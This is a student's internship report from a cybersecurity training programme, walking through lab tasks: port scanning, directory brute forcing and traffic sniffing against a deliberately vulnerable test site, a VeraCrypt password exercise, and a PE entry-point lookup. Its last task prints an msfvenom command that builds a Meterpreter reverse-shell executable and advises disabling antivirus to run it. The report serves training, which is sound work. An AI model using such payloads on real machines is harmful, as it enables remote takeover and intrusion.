ShadowFox Kavya B Raj
Shdowfox cybersecurity
Internship Final Report
Student Name: Kavya B Raj
University: Kristu Jayanti College
Major: BCA
Internship Duration: May 1st, 2025 - June 30th, 2025
Company: ShadowFox
Domain: Cyber Security
Mentor: Mr. Surendharan
Coordinator: Mr. Aakash
1
�ShadowFox Kavya B Raj
BEGINNER LEVEL
TASK 1
Find all the ports that are open in the website - http://testphp.vulnweb.com/
Step 1: Open the Zenmap GUI
Step 2: Run a basic port scan
Step 3: In the target textbox paste this link http://testphp.vulnweb.com/
Example : http://testphp.vulnweb.com
Step 4: Click on Scan and wait for the result
Nmap will start scanning the target for scan open ports. this process can take some time
depending on the size of the network and which type of scan used in scanning.
Answer : Port 80/tcp http
2
�ShadowFox Kavya B Raj
TASK 2
Performing Brute Force on the Website http://testphp.vulnweb.com/ & Find the directories present
in that Website.
Step 1: Install Dirb (if not already installed)
Step 2: Launch Terminal on your system & run Dirb
Step 3: Wait for results.
3
�ShadowFox Kavya B Raj
TASK 3
Make A Login In The Website http://testphp.vulnweb.com/ & Intercept the Network Traffic using
Wireshark and Find the credentials that were transferred through the Network.
Here’s How To Use Wireshark to Intercept network Traffic:
Step 1: Launch Wireshark.
Step 2: Choose Network Interface.
Step 3: Start Capturing The Traffic.
4
�ShadowFox Kavya B Raj
Step 4: Start Your Browser to Search.
Step 5: Analyze Traffic & Packets.
Step 6: Filter The Traffic.
5
�ShadowFox Kavya B Raj
INTERMEDIATE LEVEL
TASK 1
A File Is Encrypted Using Veracrypt (A Disk Encryption Tool). The Password To Access The File Is
Encrypted In A Hash Format And Provided To You In The Drive With The Name encoded.txt.
Decode The Password And Enter In The Veracrypt To Unlock The File And Find The Secret Code In
It. The Veracrypt Setup File Will Be Provided To You.
Open The ShadowFox Provided .txt File :
Step 1: Open The File & Decode the Password.
Step 2: To Decrypt File , We Need To Decode The Password.
After Doing This, we get the password, which is password123.
6
�ShadowFox Kavya B Raj
Step 3: Install VeraCrypt.
Step 4: Mount the Encrypted Volume.
Then, we need to enter the password, which is password123, to authenticate and mount the
volume.
Step 5: Access the Decrypted File.
After successfully mounting the encrypted volume, navigate to the file explorer within this volume and
locate the file.
7
�ShadowFox Kavya B Raj
Inside the file, we find the secret code, which is never giveup.
Answer : never giveup
8
�ShadowFox Kavya B Raj
TASK 2
An Executable File Of Veracrypt Will Be Provided To You. Find The Address Of The Entry Point Of
The Executable Using PE Explorer Tool And Provide The Value As The Answer As A Screenshot.
Find The Address Of The Entry Point Of An Executable File Using A PE Explorer Tool:
Step 1: Launch PE Explorer.
Step 2: In The Menu, Click On File And Select Open.
Step 3: Find The Folder where The VeraCrypt Executable (.exe file) Is Located.
Step 4: Select The File And Click Open.
9
�ShadowFox Kavya B Raj
Step 5: Find The Entry Point.
Look For The NT Headers (Sometimes Displayed As PE Header). Expand The Optional Header Section.
Step 6: Find The Entry Point Address.
The Entry Point Address Will Be Shown As A Hexadecimal Number Is : 004237B0h
Answer : 004237B0h
10
�ShadowFox Kavya B Raj
TASK 3
Create A Payload Using Metasploit And Make A Reverse Shell Connection From A Windows 10
Machine In Your Virtual Machine Setup.
Creating A Payload With The Help Of Metasploit On Kali Linux:
Step 1: Open Kali Linux Terminal & launch The Terminal.
Step 2: Start The Metasploit Framework On Terminal.
Command : msfconsole
Step 3: Create The Payload.
1. Identify Your IP Address (Attacker Machine) :
Command : ifconfig
Make Note Of The IP (e.g 192.168.1.100), As You'll Need It For The Payload.
1) Generate The Payload :
Use The Following msfvenom Command To Create A Reverse TCP Payload :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your Kali IP> LPORT=4444 -f exe -o
/tmp/reverse_shell.exe
11
�ShadowFox Kavya B Raj
Step 4: Transfer the Payload to the Windows 10 Machine.
Step 5: Execute The Payload On The Windows Machine.
1. On The Windows 10 Machine, Locate The reverse_shell.exe File You
Transferred.
2. Double-Click To Execute The Payload. If Windows Defender Or Any Antivirus
Software Blocks It, You May Need To Disable It (For Testing Purposes In A Lab
Environment).
Step 6: Gain Meterpreter Session.
Once The Payload Is Executed On The Windows Machine, It Will Connect Back To The Kali Linux
Machine, And You'll See The Meterpreter Session In The Metasploit Console.
Step 8: Interact With The Session.
12
�ShadowFox Kavya B Raj
THE END
13
